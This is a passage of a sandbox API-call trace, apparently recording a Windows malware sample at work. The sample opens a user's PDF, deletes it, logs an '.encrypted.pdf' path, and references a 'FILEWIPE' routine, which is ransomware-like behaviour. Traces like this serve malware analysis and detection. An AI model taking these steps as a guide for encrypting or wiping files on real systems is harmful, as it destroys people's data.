lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.587] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0035.587] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.587] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.587] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.587] FreeLibrary (hLibModule=0x754b0000) returned 1 [0035.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0035.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0035.587] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0035.587] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0035.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.587] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.588] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.588] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.589] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.589] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0035.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0035.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.589] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.589] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.590] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cd66a20, ftCreationTime.dwHighDateTime=0x1d5c3a8, ftLastAccessTime.dwLowDateTime=0xa69c42f0, ftLastAccessTime.dwHighDateTime=0x1d5bc28, ftLastWriteTime.dwLowDateTime=0xa69c42f0, ftLastWriteTime.dwHighDateTime=0x1d5bc28, nFileSizeHigh=0x0, nFileSizeLow=0x3a10, dwReserved0=0x0, dwReserved1=0x777648, cFileName="3p0Co4O-wsRFvd3SaeI.pdf", cAlternateFileName="3P0CO4~1.PDF")) returned 0x7c2240 [0035.590] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0035.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0035.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.590] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.590] CharLowerBuffW (in: lpsz="byte[14864]", cchLength=0xb | out: lpsz="byte[14864]") returned 0xb [0035.590] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.590] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.591] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.591] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0035.591] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0035.591] FreeLibrary (hLibModule=0x76b40000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0035.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0035.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0035.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.592] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.592] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.592] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.592] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0035.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.593] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.593] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.593] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.593] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0035.593] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.593] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\3p0co4o-wsrfvd3saei.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0035.593] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.593] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.593] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.593] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.593] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0035.593] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.593] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.593] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.594] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.594] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.594] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.594] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.594] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.594] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0035.594] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.594] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.594] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.594] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.594] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.594] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.594] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.594] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf", lpFilePart=0x0) returned 0x66 [0035.594] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cd66a20, ftCreationTime.dwHighDateTime=0x1d5c3a8, ftLastAccessTime.dwLowDateTime=0xa69c42f0, ftLastAccessTime.dwHighDateTime=0x1d5bc28, ftLastWriteTime.dwLowDateTime=0x14ed0640, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x3a10, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="3p0Co4O-wsRFvd3SaeI.pdf", cAlternateFileName="3P0CO4~1.PDF")) returned 0x7c2240 [0035.595] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\3p0co4o-wsrfvd3saei.pdf")) returned 1 [0035.596] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cd66a20, ftCreationTime.dwHighDateTime=0x1d5c3a8, ftLastAccessTime.dwLowDateTime=0xa69c42f0, ftLastAccessTime.dwHighDateTime=0x1d5bc28, ftLastWriteTime.dwLowDateTime=0x14ed0640, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x3a10, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="3p0Co4O-wsRFvd3SaeI.pdf", cAlternateFileName="3P0CO4~1.PDF")) returned 0 [0035.596] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0035.596] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.596] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0035.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0035.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0035.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.596] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.596] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0035.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.597] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0035.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.597] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0035.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0035.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.597] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0035.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.597] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0035.597] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.598] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.598] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0035.598] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.598] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.598] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0035.598] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x1a37, lpOverlapped=0x0) returned 1 [0035.598] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0035.598] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x1a37, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.599] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0035.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.encrypted.pdf\r\n", cchWideChar=115, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 115 [0035.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x73) returned 0x7800d0 [0035.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.encrypted.pdf\r\n", cchWideChar=115, lpMultiByteStr=0x7800d0, cbMultiByte=115, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 